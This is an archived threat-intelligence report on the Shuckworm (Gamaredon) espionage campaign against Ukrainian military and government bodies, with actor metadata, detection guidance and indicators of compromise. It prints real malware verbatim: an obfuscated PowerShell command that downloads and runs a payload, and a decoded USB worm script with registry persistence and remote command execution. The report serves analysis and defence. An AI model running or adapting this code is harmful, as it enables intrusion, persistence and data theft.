{
	"id": "db33eab7-9695-4b71-8027-5c7c0d43694e",
	"created_at": "2026-04-06T00:14:43.855359Z",
	"updated_at": "2026-04-10T03:37:04.346917Z",
	"deleted_at": null,
	"sha1_hash": "3f376504ae710b506adaf25298562f78dec63f15",
	"title": "Shuckworm: Inside Russia’s Relentless Cyber Campaign Against Ukraine",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 131937,
	"plain_text": "Shuckworm: Inside Russia’s Relentless Cyber Campaign Against Ukraine\r\nArchived: 2026-04-05 14:22:51 UTC\r\nThe Shuckworm espionage group is continuing to mount multiple cyber attacks against Ukraine, with recent targets including security services, military, and government organizations.\r\nIn some cases, Shuckworm has succeeded in staging long-running intrusions, lasting for as long as three months. The attackers repeatedly attempted to access and steal sensitive information such as reports about the deaths of Ukrainian military service members, enemy engagements and air strikes, arsenal inventories, military training, and more.\r\nIn a bid to stay ahead of detection, Shuckworm has repeatedly refreshed its toolset, rolling out new versions of known tools and short-lived infrastructure, along with new additions such as USB propagation malware.\r\nShuckworm (aka Gamaredon, Armageddon) is a Russia-linked group that has almost exclusively focused its operations on Ukraine since it first appeared in 2014. Ukrainian officials have publicly stated that the group operates on behalf of the Russian Federal Security Service (FSB).\r\nShuckworm tactics, techniques, and procedures\r\nShuckworm is known to use phishing emails as an initial infection vector, in order to gain access to victim machines and distribute malware. 
The attackers send emails with malicious attachments to Ukrainian victims, with attachments of various file types, such as:\r\n.docx\r\n.rar (RAR archive files)\r\n.sfx (self-extracting archives)\r\n.lnk\r\n.hta (HTML Application files, executed by mshta.exe)\r\nThe lures we observed related to armed conflicts, criminal proceedings, combating crime, and protection of children, among others.\r\nOnce a victim is infected, the attackers download additional backdoors and tools onto the targeted machine.\r\nShuckworm has also been observed using a new PowerShell script in order to spread its custom backdoor malware, Pterodo, via USB. Symantec, part of Broadcom, blogged about Backdoor.Pterodo in April 2022, documenting four variants of the backdoor with similar functionality. The variants are Visual Basic Script (VBS) droppers that will drop a VBScript file, use Scheduled Tasks (schtasks.exe) to maintain persistence, and download additional code from a command-and-control (C\u0026C) server.\r\nhttps://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-russia-ukraine-military\r\nPage 1 of 11\n\nExamples of recent scheduled tasks include execution of the following command lines:\r\nCSIDL_SYSTEM\\wscript.exe \"CSIDL_PROFILE\\appdata\\local\\temp\\desert\" //e:vbscript //b /dmc /j2k /spl /nff\r\nCSIDL_SYSTEM\\wscript.exe \"CSIDL_PROFILE\\favorites\\jumper.asf\" //e:vbscript //b /asf /mdf /nab /apk\r\nwscript.exe \"C:\\Users\\[REDACTED]\\Contacts\\delightful.abk\" //e:vbscript //b /cfg /mdm /cfm /mp4\r\nIn each case the //e:vbscript switch forces the VBScript engine onto a file whose extension (.asf, .abk, or none at all) would not otherwise be treated as a script, and //b runs it in batch mode so that no prompts or error dialogs are shown; the remaining switches are arguments passed to the script itself.\r\nThe new PowerShell script first copies itself onto the infected machine and creates a shortcut file with a double .rtf.lnk extension. The script uses file names such as “porn_video.rtf.lnk”, “do_not_delete.rtf.lnk” and “evidence.rtf.lnk” in an attempt to entice individuals to open the files. 
These file names are generally in Ukrainian, but some are also in English.\r\nNext, the script enumerates all drives, copying itself to any available removable disks (USB drives). These USB drives are likely used by the attackers for lateral movement across victim networks and may help the attackers reach air-gapped machines within targeted organizations.\r\nIn this recent activity, we also observed the group leveraging legitimate services to act as C\u0026C servers, including using the Telegram messaging service for its C\u0026C infrastructure. More recently, they have also used Telegram’s micro-blogging platform, Telegraph, to store C\u0026C addresses.\r\nFigure 1. Threat actors use Telegraph to store C\u0026C addresses\r\nShuckworm tends to use its C\u0026C infrastructure only for short periods of time, limiting the usefulness of its C\u0026Cs when it comes to finding more activity or linking activity together. However, the group does use SSL certificates that have some commonalities that may be leveraged for tracking purposes. We believe the group is likely leveraging pre-configured images for use in its C\u0026C deployment. 
These data points can help researchers to identify additional C\u0026C infrastructure and Shuckworm activity.\r\nSymantec also saw what was likely Giddome, a known Shuckworm backdoor with infostealer functionality, deployed onto victim networks to steal and exfiltrate data of interest.\r\nTypical Attack Chain\r\nThe following describes a typical attack chain seen on a victim machine compromised by Shuckworm in this campaign.\r\nIn one attack, the first sign of malicious activity was when the user appeared to open a RAR archive file that was likely delivered via a spear-phishing email and which contained a malicious document.\r\nAfter the document was opened, a malicious PowerShell command was observed being executed to download the next-stage payload from the attackers’ C\u0026C server:\r\n\"CSIDL_SYSTEM\\cmd.exe\" /c start /min \"\" powershell -w hidden \"$gt='/get.'+[char](56+56)+[char](104)+[char](112);$hosta=[char](50+48);[system.net.servicepointmanager]::servercertificatevalidationcallback={$true};$hosta+='.vafikgo.';$hosta+=[char](57+57);$hosta+=[char](60+57);$addrs=[system.net.dns]::gethostbyname($hosta);$addr=$addrs.addresslist[0];$client=(new-object net.webclient);$faddr='htt'+'ps://'+$addr+$gt;$text=$client.downloadstring($faddr);iex $text\"\r\nThe command assembles the C\u0026C hostname and URL path from [char] arithmetic and string concatenation, disables TLS certificate validation by setting ServerCertificateValidationCallback to $true, resolves the hostname itself and contacts the resolved IP address over HTTPS, and pipes the downloaded text straight into Invoke-Expression (iex).\r\nMore recently, Symantec has observed Shuckworm hard-coding IP addresses in its PowerShell scripts rather than resolving a domain name as this command does. 
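The following Python script is an added example, not code from the Symantec post: it shows how an analyst can triage command lines like the scheduled-task and downloader examples quoted above. It folds the [char] arithmetic and string concatenation back into literal values, recovering the domain and URL path the downloader contacts (the resolved address is left as a placeholder because it only exists at run time), and flags the traits a detection rule can key on: the VBScript engine forced onto a file with an unrelated extension, batch mode, disabled TLS certificate validation, download-and-execute, and a hidden window. The sample command lines are constructed, modelled on those quoted above; the helper names and indicator labels are the example's own.

```python
import re

Q = chr(39)  # the single-quote character, built with chr() so the regex sources below stay readable

# Constructed sample command lines, modelled on the ones quoted in the article (not copied from a victim).
# Backslashes are doubled in the source so that one path separator survives in each string.
SAMPLES = [
    # scheduled task firing a VBScript that hides behind an unrelated file extension
    'CSIDL_SYSTEM\\wscript.exe \"CSIDL_PROFILE\\Contacts\\delightful.abk\" //e:vbscript //b /cfg /mdm /cfm /mp4',
    # the obfuscated downloader, re-assembled from the pieces quoted above
    (
        '''\"CSIDL_SYSTEM\\cmd.exe\" /c start /min \"\" powershell -w hidden \"'''
        '''$gt='/get.'+[char](56+56)+[char](104)+[char](112);$hosta=[char](50+48);'''
        '''[system.net.servicepointmanager]::servercertificatevalidationcallback={$true};'''
        '''$hosta+='.vafikgo.';$hosta+=[char](57+57);$hosta+=[char](60+57);'''
        '''$addrs=[system.net.dns]::gethostbyname($hosta);$addr=$addrs.addresslist[0];'''
        '''$client=(new-object net.webclient);$faddr='htt'+'ps://'+$addr+$gt;'''
        '''$text=$client.downloadstring($faddr);iex $text\"'''
    ),
    # two ordinary command lines that must not be flagged
    'CSIDL_SYSTEM\\wscript.exe \"CSIDL_PROFILE\\Documents\\inventory.vbs\" //b',
    'powershell -NoProfile -Command Get-Service',
]

CHAR_RE = re.compile(re.escape('[char](') + '([0-9]+(?:[+][0-9]+)*)' + re.escape(')'), re.IGNORECASE)
ASSIGN_RE = re.compile('[$]([A-Za-z_][A-Za-z0-9_]*)([+]?=)([^;]*)')
TOKEN_RE = re.compile(Q + '([^' + Q + ']*)' + Q + '|[$]([A-Za-z_][A-Za-z0-9_]*)|([+ ]+)')
SCRIPT_PATH_RE = re.compile('(?:wscript|cscript)(?:[.]exe)?[ ]+(\"[^\"]+\"|[^ ]+)')
SCRIPT_EXTS = {'vbs', 'vbe', 'js', 'jse', 'wsf'}


def resolve_chars(script):
    '''Replace every [char](a+b+...) with the quoted character it evaluates to.'''
    return CHAR_RE.sub(lambda m: Q + chr(sum(int(n) for n in m.group(1).split('+'))) + Q, script)


def eval_concat(expr, env):
    '''Evaluate an expression made only of quoted literals and $variables joined by +.
    Returns None when anything else appears (a .NET call, indexing, a sub-expression),
    so attacker code is parsed but never executed.'''
    out, pos = [], 0
    while pos < len(expr):
        m = TOKEN_RE.match(expr, pos)
        if m is None:
            return None
        pos = m.end()
        if m.group(1) is not None:      # quoted literal
            out.append(m.group(1))
        elif m.group(2) is not None:    # variable; run-time-only values stay as a placeholder
            out.append(env.get(m.group(2).lower(), '<$' + m.group(2) + '>'))
    return ''.join(out)


def recover_strings(cmdline):
    '''Replay the $var= and $var+= assignments in order and return the strings they build.'''
    env = {}
    for name, op, expr in ASSIGN_RE.findall(resolve_chars(cmdline)):
        value = eval_concat(expr.strip(), env)
        if value is None:
            continue
        key = name.lower()
        env[key] = env.get(key, '') + value if op == '+=' else value
    return env


def classify(cmdline):
    '''Return the Shuckworm-style traits present in one process command line.'''
    low = cmdline.lower()
    hits = []
    if '//e:vbscript' in low:
        m = SCRIPT_PATH_RE.search(low)
        path = m.group(1).strip('\"') if m else ''
        ext = path.rsplit('.', 1)[-1] if '.' in path else ''
        if ext not in SCRIPT_EXTS:
            # //e: forces the VBScript engine; a real .vbs would not need it, so the
            # target (.abk, .wow, .asf, ...) is a script disguised by its extension
            hits.append('vbscript-engine-forced-on-disguised-file')
            if '//b' in low:
                hits.append('batch-mode-suppresses-prompts')
    if 'powershell' in low:
        if 'servercertificatevalidationcallback' in low:
            hits.append('tls-validation-disabled')
        if 'downloadstring' in low and ('iex ' in low or 'invoke-expression' in low):
            hits.append('download-and-execute')
        if '[char](' in low:
            hits.append('char-arithmetic-obfuscation')
        if '-w hidden' in low or '-windowstyle hidden' in low:
            hits.append('hidden-window')
    return hits


if __name__ == '__main__':
    for line in SAMPLES:
        print(classify(line) or 'no indicators', '<-', line[:70])
        for name, value in recover_strings(line).items():
            print('    $' + name, '=', value)
```

Run it directly to print the verdict for each sample and the recovered strings for the downloader: the host is b.vafikgo.ru, the path is /get.php, and the final URL is https://<$addr>/get.php, i.e. the implant fetches its next stage over TLS from the resolved IP with certificate checks turned off. The tokenizer refuses anything beyond quoted literals, $variables and +, which is what keeps the replay safe on untrusted input. On a real estate the same checks belong on process-creation telemetry (Sysmon Event ID 1 or Windows Security event 4688 with command-line auditing enabled). Recent variants of the script carry an IP address directly rather than resolving a hostname as this one does, which is why a replay of those yields an address instead of a name.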
Using IP addresses rather than domain names is likely an attempt to evade some of the tracking methods employed by researchers.\r\nShuckworm also continues to update the obfuscation techniques used in its PowerShell scripts in an attempt to avoid detection, with up to 25 new variants of the group’s scripts observed per month between January and April 2023.\r\nNext, a VBS script, which was Shuckworm’s Pterodo backdoor, was executed:\r\nCSIDL_SYSTEM\\wscript.exe CSIDL_PROFILE\\appdata\\local\\temp\\deprive.wow //e:vbscript //b /kmc /fff /cfm /sc4model\r\nFollowing this, we saw what appeared to be multiple similar scripts being executed. The machine used for this activity appeared to contain multiple confidential documents related to Ukrainian security services or government departments.\r\nOn a different machine, we saw malicious activity that appeared to be executed from a file (foto.safe) that had been dropped by an infected USB key that someone had plugged into the system. Symantec observed multiple file paths present on infected machines that indicate users had plugged in an infected USB key, e.g. 
\"usb-накопитель\" translates as \"usb-drive\".\r\nThe foto.safe file is a Base64-encoded script. Decoded, it looks like the following:\r\nfUNCtIon sET-lnK ($chILd) {\r\n$nAMetxt = \"foto.sAfe\".TolowER();\r\n$NAmE = (\"кОМПРОМат\", \"КОРЗиНА\", \"СеКРетнО\" | GeT-rAnDOm).ToUPPeR();\r\n$WSHSHELl = NEw-obJeCT -CoMObjeCT WSCriPT.shELL;\r\n$sHORTcut = $wShShEll.CREatesHoRTCUt($cHild +\"\\$nAMe.LNK\");\r\n$shoRtCuT.iConloCaTiON = \"C:\\wiNDoWS\\SysteM32\\SHELL32.DLL,3\";\r\n$SHOrTcUT.TArGetpAth = \"c:\\wInDOwS\\sYstEm32\\WInDOwSpowERshell\\V1.0\\POwERShEll.ExE\".ToLoweR();\r\n$text = \"-wInDoWsTYlE hidDeN -nolOgo Iex (IeX (GeT-cOnTent .\\$NAMetxt | OUT-STrIng))\".TOlower();\r\n$sHORTCUT.ArGUMEnTs = $tExt;\r\n$sHortCUT.saVE();\r\n$mYfIlE= $chIlD+\"\\$naMeTXT\"\r\ncOPY-Item $enV:UsErprOfilE\\iNdEx.phP -deSTINAtION $mYfILE\r\n$FIlE=GEt-ITEM $mYfiLE -forCe\r\n$FiLe.ATtRiButes='hiDDEN'\r\n}\r\nSet-ITemPRoPERTY -pAth HkCU:\\soFTWare\\MicROsOfT\\WiNDows\\cURRENtVerSiON\\ruN -NAME safE -valUE $env:windir'\\sYSTeM32\\wINDoWSPowErSHEll\\v1.0\\pOwERShell.eXE -WIndowSTYlE hiddEN -noLOgO inVOkE-ExpREsSIOn (get-contEnT $eNV:usERPRoFILe\\INdEX.PHp | Out-sTRing) | poweRSHeLL -noPROfILE';\r\ncoPy-item  .\\\"fOtO.safe\"  -dEsTInaTioN $Env:USeRprOFIle\\iNdEX.pHp\r\nWHile($CoUNT -lE 2){\r\n$urLs = 'hTTP://'+ [SYSTEM.NEt.DnS]::geThostadDREsSes([String]$(GEt-random)+'.cOriDAS.Ru') +'/slEEP.Php';\r\niEX $(New-ObJeCt Net.WEBClient).uPloAdStRING($uRls.ToloWER(),'')\r\n$drIVE = GeT-wmIoBJeCt WIN32_VOluME -fILTer \"drIvETYPe='2'\";\r\n$Drive.naMe | FOreaCH-oBJecT{\r\n$CHiLdS = GET-ChilDITem $drivE.nAMe\r\nfoReach($cHilDs IN $chiLDs)\r\n{\r\nif( [SYsTEM.io.fiLE]::GetAttributES($ChilDS.FuLlnAMe) -eq [SYsTEM.Io.fILeaTTrIbuTES]::DIRecToRy )\r\n{\r\nsET-lnk $chILds.fUlLName\r\n}}\r\nIF(($dRIVe.CapaCITY - $DriVe.fREeSPACE) -Gt 1000000){\r\nSEt-lNK 
$DRivE.name\r\n}}\r\nSTArt-SLEeP -S 300;\r\n}\r\nDecoded, the script does the following. It registers an HKCU Run value named safe that relaunches a hidden PowerShell at logon to read and execute %USERPROFILE%\\index.php, copies foto.safe from the current working directory to that index.php path, and then enters a loop that never ends because $COUNT is never incremented. On each pass it POSTs an empty body to http://<resolved address>/sleep.php on a random-number subdomain of coridas.ru and runs whatever the server returns, enumerates removable volumes (Win32_Volume with DriveType 2), and for each top-level folder on such a drive (and for the drive root once more than about 1 MB of it is in use) drops a hidden copy of itself named foto.safe next to a shortcut that carries a folder icon (SHELL32.DLL,3) and a Russian name chosen from КОМПРОМАТ (compromising material), КОРЗИНА (recycle bin) and СЕКРЕТНО (secret), whose target is a hidden powershell.exe that reads and executes foto.safe; it then sleeps for 300 seconds. Symantec has identified multiple variants of this script that can be used to indicate successful infection, or to download additional tools onto infected mach
ines.\r\nVictims\r\nOne of the most significant things about this campaign is the targets, which include Ukrainian military, security, research, and government organizations. The attackers were observed focusing on machines that contained what appeared from file names to be sensitive military information that may be abused to support Russian kinetic war efforts.\r\nThe majority of these attacks began in February/March 2023, with the attackers maintaining a presence on some of the victim machines until May. The sectors and nature of the organizations and machines targeted may have given the attackers access to significant amounts of sensitive information. There were indications in some organizations that the attackers were on the machines of the organizations’ human resources departments, indicating that information about individuals working at the various organizations was a priority for the attackers, among other things.\r\nThis activity demonstrates that Shuckworm’s relentless focus on Ukraine continues. 
It seems clear that Russian nation-state-backed attack groups continue to prioritize high-value Ukrainian targets in attempts to find data that may potentially help their military operations.\r\nProtection/Mitigation\r\nFor the latest protection updates, please visit the Symantec Protection Bulletin.\r\nIndicators of Compromise\r\nMalicious documents\r\nf7a6ae1b3a866b7e031f60d5d22d218f99edfe754ef262f449ed3271d6306192\r\n31e60a361509b60e7157756d6899058213140c3b116a7e91207248e5f41a096b\r\nc62dd5b6036619ced5de3a340c1bb2c9d9564bc5c48e25496466a36ecd00db30\r\nc6f6838afcb177ea9dda624100ce95549cee93d9a7c8a6d131ae2359cabd82c8\r\n3393fbdb0057399a7e04e61236c987176c1498c12cd869dc0676ada859617137\r\n3458cec74391baf583fbc5db3b62f1ce106e6cffeebd0978ec3d51cebf3d6601\r\nacc2b78ce1c0fc806663e3258135cdb4fed60682454ab0646897e3f240690bb8\r\nUSB propagation scripts\r\n28358a4a6acdcdfc6d41ea642220ef98c63b9c3ef2268449bb02d2e2e71e7c01\r\n2aee8bb2a953124803bc42e5c42935c92f87030b65448624f51183bf00dd1581\r\ndbd03444964e9fcbd582eb4881a3ff65d9513ccc08bd32ff9a61c89ad9cc9d87\r\na615c41bcf81dd14b8240a7cafb3c7815b48bb63842f7356731ade5c81054df5\r\n91d42a959c5e4523714cc589b426fa83aaeb9228364218046f36ff10c4834b86\r\nExample of LNK files created\r\n7d6264ce74e298c6d58803f9ebdb4a40b4ce909d02fd62f54a1f8d682d73519a\r\nLNK file names\r\naccount.rtf.lnk\r\naccount_card.rtf.lnk\r\napplication.rtf.lnk\r\nbank_accоunt.rtf.lnk\r\nblank_cap.rtf.lnk\r\nbusiness trip.rtf.lnk\r\ncompromising_evidence.rtf.lnk\r\nconduct.rtf.lnk\r\ncuprovod.rtf.lnk\r\ndo_not_delete.rtf.lnk\r\ndsk.rtf.lnk\r\nencouragement.rtf.lnk\r\nform_new.rtf.lnk\r\ninstructions.rtf.lnk\r\njourney.mdb\r\nletter 
to.rtf.lnk\r\nlogin_password.docx.lnk\r\nlogin_password.rtf.lnk\r\nmobilization.rtf.lnk\r\nmy_documents.rtf.lnk\r\nmy_photos.rtf.lnk\r\nnot_delete.rtf.lnk\r\non_account.rtf.lnk\r\norder.rtf.lnk\r\npetition.rtf.lnk\r\nporn_video.rtf.lnk\r\npornography.rtf.lnk\r\npornophoto.rtf.lnk\r\nproceedings.rtf.lnk\r\nproject_sheet.rtf.lnk\r\nreport.docx.lnk\r\nreport.rtf.lnk\r\nreport_note.rtf.lnk\r\nrequest.rtf.lnk\r\nresolution.rtf.lnk\r\nsecret.rtf.lnk\r\nsecretly.rtf.lnk\r\nservice.docx.lnk\r\nservice.rtf.lnk\r\nsources.rtf.lnk\r\nsupport.rtf.lnk\r\nweapons_list.rtf.lnk\r\nRecent C\u0026C infrastructure (2023)\r\n45.76.141[.]166\r\n159.223.112[.]245\r\n140.82.56[.]186\r\n159.203.164[.]194\r\n45.32.94[.]58\r\n45.95.232[.]33\r\n139.59.109[.]100\r\n164.92.245[.]246\r\n45.32.101[.]6\r\n140.82.18[.]48\r\n216.128.140[.]45\r\n146.190.127[.]238\r\n207.148.74[.]68\r\n195.133.88[.]19\r\n146.190.60[.]230\r\n84.32.190[.]137\r\n206.189.154[.]168\r\n188.166.4[.]128\r\n104.248.54[.]250\r\n165.227.76[.]84\r\n66.42.104[.]158\r\n161.35.95[.]47\r\n149.28.125[.]56\r\n143.198.50[.]118\r\n66.42.126[.]121\r\n64.227.72[.]210\r\n81.19.140[.]147\r\n165.232.77[.]197\r\n146.190.117[.]209\r\n134.122.51[.]47\r\n143.198.152[.]232\r\n140.82.47[.]181\r\n159.223.102[.]109\r\n170.64.188[.]146\r\n155.138.194[.]244\r\n45.32.88[.]90\r\n89.185.84[.]32\r\n64.226.84[.]229\r\n206.189.14[.]94\r\n24.199.84[.]132\r\n45.32.41[.]115\r\n84.32.188[.]69\r\n206.189.128[.]172\r\n170.64.168[.]228\r\n161.35.238[.]148\r\n170.64.138[.]138\r\n178.128.86[.]43\r\n206.81.28[.]5\r\n178.128.231[.]180\r\n45.77.115[.]67\r\n136.244.65[.]253\r\n143.244.190[.]199\r\n159.65.176[.]121\r\n192.248.154[.]154\r\n209.97.175[.]128\r\n147.182.240[.]58\r\n146.190.212[.]239\r\n143.198.135[.]132\r\n45.76.202[.]102\r\n142.93.108[.]1\r\n46.101.127[.]147\r\n134.209.0[.]136\r\n138.68.110[.]19\r\n167.99.215[.]50\r\n161.35.232[.]118\r\n88.216.210[.]3\r\n165.227.121[.]87\r\n165.227.48[.]59\r\n108.61.211[.]250\r\n89.185.84[.]48\r\n167.172.69[.]123\r\n89.185.84[.]50\r\n206.189.0[.]134\r\n68.183.200[.]0\r\n178.128.16[.]170\r\n95.179.144[.]161\r\n164.92.222[.]8\r\n45.95.233[.]80\r\n78.141.239[.]24\r\n149.28.181[.]232\r\n24.199.107[.]218\r\n45.32.184[.]140\r\n167.172.20[.]159\r\n84.32.190[.]31\r\n164.92.185[.]60\r\n84.32.131[.]38\r\n137.184.178[.]46\r\n206.189.149[.]103\r\n157.245.176[.]123\r\n45.95.232[.]92\r\n45.95.232[.]29\r\n170.64.150[.]90\r\n89.185.84[.]45\r\n140.82.16[.]120\r\n84.32.185[.]136\r\n134.122.43[.]175\r\n195.133.88[.]55\r\n84.32.191[.]147\r\n78.141.238[.]136\r\n45.82.13[.]84\r\n159.65.248[.]0\r\n84.32.34[.]69\r\n170.64.146[.]194\r\n45.82.13[.]22\r\n45.82.13[.]23\r\n134.209.33[.]42\r\n199.247.8[.]115\r\n84.32.128[.]239\r\n173.199.70[.]238\r\n138.68.174[.]177\r\n178.128.213[.]177\r\n143.110.180[.]68\r\n167.172.144[.]127\r\n165.232.165[.]42\r\n45.95.232[.]51\r\n149.28.98[.]149\r\n104.156.230[.]193\r\n104.248.86[.]158\r\n134.122.51[.]47\r\n134.209.182[.]221\r\n139.59.60[.]191\r\n140.82.11[.]60\r\n140.82.47[.]181\r\n140.82.50[.]37\r\n143.198.135[.]132\r\n143.198.53[.]203\r\n147.182.250[.]33\r\n149.28.130[.]189\r\n149.28.181[.]232\r\n149.28.98[.]149\r\n155.138.194[.]244\r\n157.245.69[.]118\r\n158.247.204[.]242\r\n159.223.102[.]109\r\n159.223.23[.]23\r\n164.92.72[.]212\r\n165.22.72[.]74\r\n165.227.76[.]84\r\n165.232.120[.]169\r\n167.172.58[.]96\r\n167.71.67[.]58\r\n170.64.136[.]186\r\n170.64.140[.]214\r\n170.64.156[.]98\r\n178.128.228[.]252\r\n188.166.176[.]39\r\n188.166.7[.]140\r\n193.149.176[.]26\r\n195.133.88[.]55\r\n202.182.116[.]135\r\n202.182.98[.]100\r\n206.189.80[.]216\r\n207.148.72[.]173\r\n31.129.22[.]46\r\n31.129.22[.]48\r\n31.129.22[.]50\r\n45.32.101[.]6\r\n45.32.117[.]62\r\n45.32.158[.]96\r\n45.32.62[.]100\r\n45.32.88[.]90\r\n45.82.13[.]84\r\n45.95.232[.]33\r\n45.95.232[.]74\r\n45.95.233[.]80\r\n5.199.161[.]29\r\n64.226.84[.]229\r\n64.227.64[.]163\r\n66.42.104[.]158\r\n68.183.200[.]0\r\n78.141.239[.]24\r\n78.153.139[.]7\r\n81.19.140[.]147\r\n84.32.131[.]47\r\n84.32.188[.]13\r\n95.179.144[.]161\r\n95.179.245[.]185\r\n216.128.178[.]248\r\nSource: https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-russia-ukraine-military",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"ETDA",
		"Malpedia"
	],
	"references": [
		"https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-russia-ukraine-military"
	],
	"report_names": [
		"shuckworm-russia-ukraine-military"
	],
	"threat_actors": [
		{
			"id": "81bd7107-6b2d-45c9-9eea-1843d4b9b308",
			"created_at": "2022-10-25T15:50:23.320841Z",
			"updated_at": "2026-04-10T02:00:05.356444Z",
			"deleted_at": null,
			"main_name": "Gamaredon Group",
			"aliases": [
				"Gamaredon Group",
				"IRON TILDEN",
				"Primitive Bear",
				"ACTINIUM",
				"Armageddon",
				"Shuckworm",
				"DEV-0157",
				"Aqua Blizzard"
			],
			"source_name": "MITRE:Gamaredon Group",
			"tools": [
				"QuietSieve",
				"Pteranodon",
				"Remcos",
				"PowerPunch"
			],
			"source_id": "MITRE",
			"reports": null
		},
		{
			"id": "d5156b55-5d7d-4fb2-836f-861d2e868147",
			"created_at": "2023-01-06T13:46:38.557326Z",
			"updated_at": "2026-04-10T02:00:03.023048Z",
			"deleted_at": null,
			"main_name": "Gamaredon Group",
			"aliases": [
				"ACTINIUM",
				"DEV-0157",
				"Blue Otso",
				"G0047",
				"IRON TILDEN",
				"PRIMITIVE BEAR",
				"Shuckworm",
				"UAC-0010",
				"BlueAlpha",
				"Trident Ursa",
				"Winterflounder",
				"Aqua Blizzard",
				"Actinium"
			],
			"source_name": "MISPGALAXY:Gamaredon Group",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "61940e18-8f90-4ecc-bc06-416c54bc60f9",
			"created_at": "2022-10-25T16:07:23.659529Z",
			"updated_at": "2026-04-10T02:00:04.703976Z",
			"deleted_at": null,
			"main_name": "Gamaredon Group",
			"aliases": [
				"Actinium",
				"Aqua Blizzard",
				"Armageddon",
				"Blue Otso",
				"BlueAlpha",
				"Callisto",
				"DEV-0157",
				"G0047",
				"Iron Tilden",
				"Operation STEADY#URSA",
				"Primitive Bear",
				"SectorC08",
				"Shuckworm",
				"Trident Ursa",
				"UAC-0010",
				"UNC530",
				"Winterflounder"
			],
			"source_name": "ETDA:Gamaredon Group",
			"tools": [
				"Aversome infector",
				"BoneSpy",
				"DessertDown",
				"DilongTrash",
				"DinoTrain",
				"EvilGnome",
				"FRAUDROP",
				"Gamaredon",
				"GammaDrop",
				"GammaLoad",
				"GammaSteel",
				"Gussdoor",
				"ObfuBerry",
				"ObfuMerry",
				"PlainGnome",
				"PowerPunch",
				"Pteranodon",
				"Pterodo",
				"QuietSieve",
				"Remcos",
				"RemcosRAT",
				"Remote Manipulator System",
				"Remvio",
				"Resetter",
				"RuRAT",
				"SUBTLE-PAWS",
				"Socmer",
				"UltraVNC"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "236a8303-bf12-4787-b6d0-549b44271a19",
			"created_at": "2024-06-04T02:03:07.966137Z",
			"updated_at": "2026-04-10T02:00:03.706923Z",
			"deleted_at": null,
			"main_name": "IRON TILDEN",
			"aliases": [
				"ACTINIUM",
				"Aqua Blizzard",
				"Armageddon",
				"Blue Otso",
				"BlueAlpha",
				"Dancing Salome",
				"Gamaredon",
				"Gamaredon Group",
				"Hive0051",
				"Primitive Bear",
				"Shuckworm",
				"Trident Ursa",
				"UAC-0010",
				"UNC530",
				"WinterFlounder"
			],
			"source_name": "Secureworks:IRON TILDEN",
			"tools": [
				"Pterodo"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775434483,
	"ts_updated_at": 1775792224,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/3f376504ae710b506adaf25298562f78dec63f15.pdf",
		"text": "https://archive.orkl.eu/3f376504ae710b506adaf25298562f78dec63f15.txt",
		"img": "https://archive.orkl.eu/3f376504ae710b506adaf25298562f78dec63f15.jpg"
	}
}